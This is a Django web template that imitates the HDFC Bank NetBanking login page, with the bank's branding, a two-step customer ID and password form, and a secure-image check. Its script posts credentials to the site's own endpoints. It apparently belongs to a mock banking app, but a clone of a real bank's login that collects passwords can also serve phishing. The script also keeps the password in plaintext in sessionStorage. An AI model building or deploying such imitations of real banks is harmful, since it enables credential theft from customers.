<!DOCTYPE html>
<html lang="en">
{% load static %}
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <title>HDFC NetBanking Login</title>
  <link href="https://fonts.googleapis.com/css2?family=Open+Sans&display=swap" rel="stylesheet" />
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet" />
  <style>
    body {
      background-color: #f3f3f3;
      font-family: 'Open Sans', sans-serif;
      font-size: 14px;
      color: #666666;
    }

    .bullet li,
    .side-text li {
      color: #1e1e1e;
      margin: 0px 0px 5px;
    }

    .container-box {
      background: #fff;
      max-width: 960px;
      width: 100%;
      margin: 0px auto;
      padding: 20px;
      margin-bottom: 40px;
    }

    .form-control {
      border-radius: 0;
      box-shadow: none;
    }

    .btn-primary {
      background-color: #007bff;
      border: none;
      border-radius: 0;
      width: 100%;
    }

    .btn-primary:hover {
      background-color: #0069d9;
    }

    .info-box {
      background: #e2effa;
      padding: 10px;
      font-size: 14px;
    }

    .small-links a {
      font-size: 14px;
      text-decoration: none;
      margin-right: 10px;
    }

    .footer {
      background: #035297;
      color: #fff;
      font-size: 11px;
      text-align: center;
    }

    .footer a {
      color: #fff;
      margin: 0 0px 0px 20px;
      text-decoration: none;
    }

    .norton-img {
      display: block;
      margin: 0 auto;
      max-width: 100px;
    }

    a {
      color: #1d86ff;
      text-decoration: none;
    }

    .readonly-field {
      background-color: #eee !important;
      color: #555 !important;
      cursor: not-allowed;
    }

    .hdfcstatictxt {
      font-size: 18px;
      color: #333;
      margin: 0px 0px 20px;
    }

    tr {
      height: 39px;
    }

    ol,
    ul {
      padding-left: 1rem !important;
    }

    .side-text {
      font-size: 14px;
    }

    .right-section {
      display: flex;
      align-items: center;
      gap: 20px;
      flex-direction: column;
    }

    .col-md-6 {
      max-width: 460px;
      width: 100%;
      padding: 0px !important;
    }

    .form-control {
      display: block;
      width: 100%;
      height: 34px;
      padding: 6px 12px;
      font-size: 14px;
      line-height: 1.42857143;
      color: #555;
      background-color: #fff;
      background-image: none;
      border: 1px solid #ccc;
      border-radius: 4px;
      box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075);

    }

    .text-muted {
      color: #777;
    }

    button,
    input,
    select,
    textarea {
      font-family: inherit;
      font-size: inherit;
      line-height: inherit;
    }

    input {
      line-height: normal;
    }

    .btn-primary {
      background: #1d86ff;
      border: 1px solid transparent;
      font-size: 16px;
      padding: 6px 20px;
    }

    .btn {
      box-shadow: 0px 1px 1px rgba(0, 0, 0, 0.3);
      text-transform: uppercase;
      border-radius: 3px;
    }

    .btn {
      display: inline-block;
      margin-bottom: 0;
      font-weight: 400;
      text-align: center;
      white-space: nowrap;
      vertical-align: middle;
      -ms-touch-action: manipulation;
      touch-action: manipulation;
      cursor: pointer;
      background-image: none;
      border: 1px solid transparent;
      padding: 6px 12px;
      font-size: 14px;
      line-height: 1.42857143;
      border-radius: 4px;
    }

    .footer-btm {
      font-size: 11px;
      padding: 20px 0;
      align-items: flex-start;
      max-width: 960px;
      width: 100%;
      display: flex
    }


    .welcmewrap {
      background-color: #FFFFFF;
      padding: 20px;
      align-items: center;
      text-align: center;
      margin-bottom: 10px;
    }

    .hdfcwelcmetxt {
      font-size: 20px;
      color: #333;
    }

    .row {
      margin-right: 0px;
    }

    @media (max-width: 720px) {
      .norton-img {
        margin: 0 !important;
      }

      .right-section div {
        margin-left: 0 !important;
      }

      .right-section {
        display: grid;
      }
    }

    @media (min-width: 1200px) {

      .container,
      .container-lg,
      .container-md,
      .container-sm,
      .container-xl {
        max-width: 960px;
        width: 100%;
      }
    }
  </style>
</head>

<body>
  <div class="welcmewrap center col-sm-12">
    <div class="hdfcwelcmetxt" id="hdfcwelcmetxtId"> Welcome to HDFC Bank NetBanking </div>
    <img src="{% static 'images/Logo.svg' %}" alt="HDFC Bank">
  </div>
  <div class="container-box">
    <!-- Step 1 -->
    <h5 class="hdfcstatictxt">Login to NetBanking</h5>
    <div style="margin-left: 12px;">
      <div class="row" id="step1">
        <!-- Left Column -->
        <div class="col-md-6">

          <div class="row align-items-start mb-3" style="margin-bottom: 20px !important;">
            <div class="col-12 col-md-auto mb-2 mb-md-0">
              <label for="userId" class="col-form-label">Customer ID/ User ID</label>
            </div>
            <div class="col-12 col-md">
              <input type="text" class="form-control mb-1" id="userId" style="max-width: 245px; height: 30px;" />
              <input type="hidden" class="form-control mb-1" id="user" style="max-width: 245px; height: 30px;" />
              <a href="#" class="forgot-link d-block mb-3">Forgot Customer ID</a>
              <button class="btn btn-primary" onclick="proceedToPassword()"
                style="max-width: 245px; width: 100%;">CONTINUE</button>
            </div>
          </div>
          <div class="info-box">
            <p class="mb-0" style="color: #333;">Dear Customer,<br>
              Welcome to the new login page of HDFC Bank NetBanking. Its lighter look and feel is designed to give you
              the best possible user experience. Please continue to login using your customer ID and password.
            </p>
          </div>
          <p class="hdfcstatictxt">Don't have a HDFC Bank Savings Account?</p>
          <table>
            <tbody>
              <tr>
                <td>
                  <div class="hdfcsmalltxt mB20"><a href="javascript:void(0)">Credit Card only? Login here</a></div>
                </td>
                <td style="padding-left:10px;">
                  <div class="hdfcsmalltxt mB20"><a href="javascript:void(0)">HDFC Ltd. Home Loans? Login here</a></div>
                </td>
              </tr>
              <tr>
                <td>
                  <div class="hdfcsmalltxt mB20"><a href="javascript:void(0)">Prepaid Card only ? Login here</a></div>
                </td>
                <td style="padding-left:10px;">
                  <div class="hdfcsmalltxt mB20"><a href="javascript:void(0)">HDFC Ltd. Deposits? Login here</a></div>
                </td>
              </tr>
              <tr>
                <td colspan="2">
                  <div class="hdfcsmalltxt mB20"><a href="javascript:void(0)">Retail Loan only? Login here</a></div>
                </td>
              </tr>
            </tbody>
          </table>
        </div>

        <!-- Right Column -->
        <div class="col-md-6">
          <div class="right-section">
            <img class="norton-img" src="{% static 'images/nortonsecurity.png' %}" alt="Norton Security" />
            <div>
              <p class="side-text mb-1" style="margin-bottom: -3px !important;">Your security is of atmost importance.
              </p>
              <a href="#">Know More...</a>

              <p class="hdfcstatictxt mt-4 mb-1">First Time User? </p>
              <p style="margin-top: -10px;"><a href="#">Register Now</a> for a host of convenient features.</p>

              <p class="hdfcstatictxt">We have added a host of new features!</p>
              <ul class="side-text">
                <li>Anywhere access through Desktop or mobile</li>
                <li>Enhanced security measures</li>
              </ul>
            </div>
          </div>
        </div>

      </div>

      <!-- Step 2 -->
      <div class="row" id="step2" style="display: none;">
        <!-- Left Column -->
        <div class="container">
          <div class="row" style="margin-bottom: 20px; padding-bottom: 20px;border-bottom: 1px solid #dddddd;">
            <!-- Left Column: Login Form -->
            <div class="col-md-6">
              <div class="row align-items-start mb-3">
                <!-- Customer ID Row -->
                <div class="col-12 col-md-auto mb-2 mb-md-0">
                  <label for="userId" class="col-form-label">Customer ID/ User ID</label>
                </div>
                <div class="col-12 col-md">
                  <input type="text" readonly class="form-control readonly-field" id="fldCustIdDispId"
                    style="max-width: 245px; height: 30px;" />
                </div>
              </div>

              <!-- Password Row -->
              <div class="row align-items-start mb-3">
                <div class="col-12 col-md-auto mb-2 mb-md-0">
                  <label for="fldPasswordDispId" class="col-form-label" style="width: 138.69px;">Password/ IPIN</label>
                </div>
                <div class="col-12 col-md">
                  <input type="password" class="form-control" id="fldPasswordDispId" placeholder="Password/ IPIN"
                    style="max-width: 245px; height: 30px;" />
                  <a href="#">Forgot Password / IPIN</a>
                  <p class="text-muted small" style="font-size: 12px !important;">IPIN (Password) is case sensitive</p>

                  <div class="form-check">
                    <input class="form-check-input" type="checkbox" onclick="showVirtualKeyBoard()" id="chksecmod"
                      style="border-color: 1px solid #ccc;">
                    <label class="form-check-label" for="chksecmod" style="color:#333; font-size: 12px;">
                      Use virtual keyboard for password
                    </label>
                  </div>
                </div>
              </div >

              <!-- Secure Access ID Row -->
              <div class="row align-items-start mb-3">
                <div class="col-12 col-md-auto mb-2 mb-md-0">
                  <label class="col-form-label" style="color: #868686;">Verify Secure Access ID</label>
                </div>
                <div class="col-12 col-md">
                  <div class="d-flex align-items-start" style="margin-bottom: 20px;">
                    <img id="security_image" src="{% static 'images/nortonsecurity.png' %}" alt="Secure ID" width="100"
                      height="100">
                    <div class="ms-3 d-flex flex-column justify-content-between" style="height: 100px;">
                      <!-- Checkbox for "I like to travel" -->
                   
                        <label id="security_question" class="form-check-label" for="chkTravel"><strong>I like to
                            travel</strong></label>
                        
                    

                      <!-- Another checkbox -->
                      <div class="form-check">
                        <input type="checkbox" class="form-check-input" id="check_secure" style="border-color: #ccc;" />
                        <label class="form-check-label" for="chkrsastu">This is my Secure ID</label>
                        <input type="hidden" id="check_secure_val" name="check_secure_val" value="0" />
                      </div>
                    </div>

                  </div>
                  <button class="btn btn-primary" onclick="proceedTodashboard()" style="max-width: 245px; width: 100%;">
                    CONTINUE
                  </button>
                </div>
              </div>


            </div>


            <!-- Right Column: Security Info -->
            <div class="col-md-5">
              <div class="right-section" style="margin-left: 75px;">
                <img class="norton-img" src="{% static 'images/nortonsecurity.png' %}" alt="Norton Security" />
                <div class="mobiletext" style="margin-left: -76px;">
                  <p class="side-text mb-1" style="margin-bottom: -3px !important;">Your security is of atmost
                    importance.
                  </p>
                  <a href="#">Know More...</a>
                </div>
              </div>
            </div>
          </div>
        </div>

        <div class="container">
          <div class="row">
            <!-- Left Side: Table Section -->
            <div class="col-sm-7">
              <p class="hdfcstatictxt">Don't have a HDFC Bank Savings Account?</p>
              <table>
                <tbody>
                  <tr>
                    <td>
                      <div class="hdfcsmalltxt mB20">
                        <a href="javascript:void(0)">Credit Card only? Login here</a>
                      </div>
                    </td>
                    <td style="padding-left:10px;">
                      <div class="hdfcsmalltxt mB20">
                        <a href="javascript:void(0)">HDFC Ltd. Home Loans? Login here</a>
                      </div>
                    </td>
                  </tr>
                  <tr>
                    <td>
                      <div class="hdfcsmalltxt mB20">
                        <a href="javascript:void(0)">Prepaid Card only ? Login here</a>
                      </div>
                    </td>
                    <td style="padding-left:10px;">
                      <div class="hdfcsmalltxt mB20">
                        <a href="javascript:void(0)">HDFC Ltd. Deposits? Login here</a>
                      </div>
                    </td>
                  </tr>
                  <tr>
                    <td colspan="2">
                      <div class="hdfcsmalltxt mB20">
                        <a href="javascript:void(0)">Retail Loan only? Login here</a>
                      </div>
                    </td>
                  </tr>
                </tbody>
              </table>
            </div>

            <!-- Right Side: Features Section -->
            <div class="col-sm-5 rightwrap fr">
              <div class="hdfcstatictxt mB20">We have added a host of new features!</div>
              <div class="hdfcsmalltxt mB10" style="margin-bottom: 10px;">
                <span class="lightblackcolor" style="color: #1e1e1e;">You can now do so much more:</span>
              </div>
              <div class="hdfcsmalltxt mB20">
                <span class="lightblackcolor">
                  <ul class="bullet">
                    <li>Anywhere access through Desktop or mobile</li>
                    <li>Enhanced security measures</li>
                  </ul>
                </span>
              </div>
              <div class="hdfcsmalltxt mB20" style="margin-top: -5px;">
                <span class="lightblackcolor">
                  <a class="lightbluecolor" target="_blank"
                    href="https://v1.hdfcbank.com/htdocs/common/onlineservices/netbankingdemo/index.html">
                    View a Demo
                  </a>
                </span>
              </div>
            </div>
          </div>
        </div>

      </div>
    </div>
  </div>

  </footer>
  <footer class="footer">
    <div class="container">
      <div class="footer-btm">
        <span>© Copyright HDFC Bank Ltd.</span>
        <div class="footer-links">
          <a href="#">Terms and Conditions</a>
          <a href="#">Privacy Policy</a>
        </div>
      </div>
    </div>
  </footer>

  <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
  <script>

    sessionStorage.clear();
let userData1 = JSON.parse(sessionStorage.getItem("userData"));
console.log('user data 111',userData1);

    

    let userData = null;
   document.addEventListener("DOMContentLoaded", function () {
    const checkbox = document.getElementById("check_secure");
    const valueField = document.getElementById("check_secure_val");

    checkbox.addEventListener("change", function () {
      console.log("Inside the update travel");
      valueField.value = checkbox.checked ? "1" : "0";
      console.log("Value updated to:", valueField.value);
    });
  });

    function getCookie(name) {
      let cookieValue = null;
      if (document.cookie && document.cookie !== '') {
        const cookies = document.cookie.split(';');
        for (let cookie of cookies) {
          cookie = cookie.trim();
          // Check if this cookie string begins with the name we want
          if (cookie.substring(0, name.length + 1) === (name + '=')) {
            cookieValue = decodeURIComponent(cookie.substring(name.length + 1));
            break;
          }
        }
      }
      return cookieValue;
    }

    function proceedToPassword() {




      const csrftoken = getCookie('csrftoken');
      $.ajax({
        url: "verify_user/",
        method: "POST",
        headers: {
          "X-CSRFToken": csrftoken
        },
        data: {
          username: $('#userId').val()

        },
        success: function (data) {
          if (data.status === 0) {
            console.error("Error from server:", data.message || "Unknown error");
            alert("Login failed: " + (data.message || "Invalid credentials"));
            location.reload();
          } else {
            const userData = data.data;
            console.log('userdata---->',userData)
            $('#user').val(userData.user_data.id);
            const newFileName = userData.user_security.user_image_url.split('/').pop(); // "myimage.gif"

            const $img = $('#security_image');
            const currentSrc = $img.attr('src'); // e.g. "/static/images/nortonsecurity.png"

            // Replace only the filename part
            const newSrc = currentSrc.replace(/[^/]+$/, newFileName); // "/static/images/myimage.gif"
            $img.attr('src', newSrc);

            const newLabelText = userData.user_security.security_question;
            console.log('newlabel----', newLabelText)
            $('#security_question').text(newLabelText);

            console.log("Updated image src to:", newSrc);
          }
        },
        error: function (xhr, status, error) {
          console.error("AJAX Error:", error);
          alert("Something went wrong with the request.");
        }
      });


      const customerId = document.getElementById("userId").value.trim();
      if (customerId === "") {
        alert("Please enter your Customer ID.");
        return;
      }

      document.getElementById("fldCustIdDispId").value = customerId;
      document.getElementById("fldCustIdDispId").setAttribute("readonly", true);
      document.getElementById("step1").style.display = "none";
      document.getElementById("step2").style.display = "flex";
    }

    function showVirtualKeyBoard() {
      const kb = document.getElementById("keyboardDiv");
      kb.style.display = kb.style.display === "none" ? "block" : "none";
    }

    function fLogon() {
      alert("Logging in...");
      // Add your login logic here
    }
    function proceedTodashboard() {
      const travelValue = document.getElementById("check_secure_val").value;
      if (travelValue === '0') {
        alert("Select checkbox");
        return;
      }

      const csrftoken = getCookie('csrftoken');

      const user_details = {
        username: $('#userId').val(),
        userID: $('#user').val(),
        password: $('#fldPasswordDispId').val()
      };

      $.ajax({
        url: "verify_password/",
        method: "POST",
        headers: {
          "X-CSRFToken": csrftoken
        },
        data: user_details,
        success: function (data) {
          if (data.status === 0) {
            alert("Login failed: " + (data.message || "Invalid credentials"));
            location.reload();
          } else {
            console.log("Success:", data);

            // Store in sessionStorage (optional, only client-side)
            sessionStorage.setItem("userData", JSON.stringify(user_details));

            // Redirect AFTER successful login
            let userID = $('#user').val();
            window.location.href = `/dashboard/?userID=${encodeURIComponent(userID)}`;
          }
        },
        error: function (xhr, status, error) {
          alert("Something went wrong with the request.");
        }
      });
    }

  </script>
</body>

</html>